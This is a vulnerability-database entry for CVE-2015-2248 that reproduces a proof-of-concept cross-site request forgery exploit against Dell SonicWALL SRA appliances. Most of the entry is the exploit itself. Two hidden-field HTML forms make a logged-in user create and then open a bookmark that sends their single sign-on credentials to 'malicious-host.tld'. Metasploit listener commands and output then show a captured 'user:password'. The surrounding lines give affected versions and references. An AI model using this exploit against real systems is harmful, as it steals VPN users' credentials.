ID
VAR-E-201505-0061
CVE
cve_id: | CVE-2015-2248 | Trust: 2.1 |
EDB ID
36940
TITLE
Dell SonicWALL Secure Remote Access (SRA) Appliance - Cross-Site Request Forgery - CGI webapps Exploit
Trust: 0.6
DESCRIPTION
Dell SonicWALL Secure Remote Access (SRA) Appliance - Cross-Site Request Forgery. CVE-2015-2248CVE-121557 . webapps exploit for CGI platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | dell | model: | sonicwall secure remote access appliance | scope: | - | version: | - | Trust: 1.0 |
vendor: | dell | model: | sonicwall secure remote access | scope: | eq | version: | 7.5/8.0 | Trust: 0.5 |
EXPLOIT
# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery
# Date: 04/28/2015
# Exploit Author: Veit Hailperin
# Vendor Homepage: www.dell.com
# Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv
# CVE : 2015-2248
Exploitation Procedure (Outline):
1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker.
2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay.
3. Gather the credentials on the target server provided in step #1
1. Create a bookmark:
<html>
<body>
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST">
<input type="hidden" name="bmName" value="foo" />
<input type="hidden" name="host" value="www.malicious-host.tld" />
<input type="hidden" name="description" value="bar" />
<input type="hidden" name="tabs" value="Baz" />
<input type="hidden" name="service" value="HTTP" />
<input type="hidden" name="fbaSSOEnabled" value="on" />
<input type="hidden" name="fbaSSOFormUserName" value="user" />
<input type="hidden" name="fbaSSOFormUserPassword" value="password" />
<input type="hidden" name="MC_App" value="inherit" />
<input type="hidden" name="MC_Copy" value="inherit" />
<input type="hidden" name="MC_Print" value="inherit" />
<input type="hidden" name="MC_Offline" value="inherit" />
<input type="hidden" name="name" value="name" />
<input type="hidden" name="type" value="type" />
<input type="hidden" name="owner" value="owner" />
<input type="hidden" name="cmd" value="add" />
<input type="hidden" name="wantBmData" value="true" />
<input type="hidden" name="ok" value="OK" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Call the newly created bookmark
This might require some guesswork, because we don't know which value bookmarkAccessed needs to have.
<html>
<body>
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/http">
<input type="hidden" name="HOST" value="www.malicious-host.tld" />
<input type="hidden" name="bookmarkAccessed" value="4" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3. Set up a listener
E.g. metasploit payload
use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:80...
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://www.malicious-host.tld:80/
[*] Server started.
[*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld
[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
tag: | remote | Trust: 0.5 |
tag: | proof of concept | Trust: 0.5 |
tag: | csrf | Trust: 0.5 |
CREDITS
Veit Hailperin
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2015-2248 | Trust: 2.1 |
db: | EXPLOIT-DB | id: | 36940 | Trust: 1.6 |
db: | EDBNET | id: | 58222 | Trust: 0.6 |
db: | PACKETSTORM | id: | 131762 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2015-2248 | Trust: 2.1 |
url: | https://www.exploit-db.com/exploits/36940/ | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 131762 |
db: | EXPLOIT-DB | id: | 36940 |
db: | EDBNET | id: | 58222 |
LAST UPDATE DATE
2022-07-27T09:32:39.746000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 131762 | date: | 2015-05-05T19:30:10 |
db: | EXPLOIT-DB | id: | 36940 | date: | 2015-05-07T00:00:00 |
db: | EDBNET | id: | 58222 | date: | 2015-05-07T00:00:00 |